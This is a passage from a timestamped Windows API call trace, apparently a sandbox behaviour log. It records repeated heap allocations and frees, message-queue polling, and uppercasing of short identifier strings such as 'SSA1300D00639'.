hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0188.517] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0188.518] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0188.518] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.519] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0188.519] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.520] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.520] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0188.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.521] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0188.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0188.521] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0188.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0188.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0188.522] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0188.522] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.523] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.523] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0188.523] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.523] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0188.523] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0188.524] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0188.524] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.525] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0188.525] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0188.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0188.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.526] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0188.526] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0188.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0188.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0188.527] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0188.527] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0188.528] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0188.528] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0188.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.529] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0188.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.529] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0188.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0188.529] PeekMessageW (in: 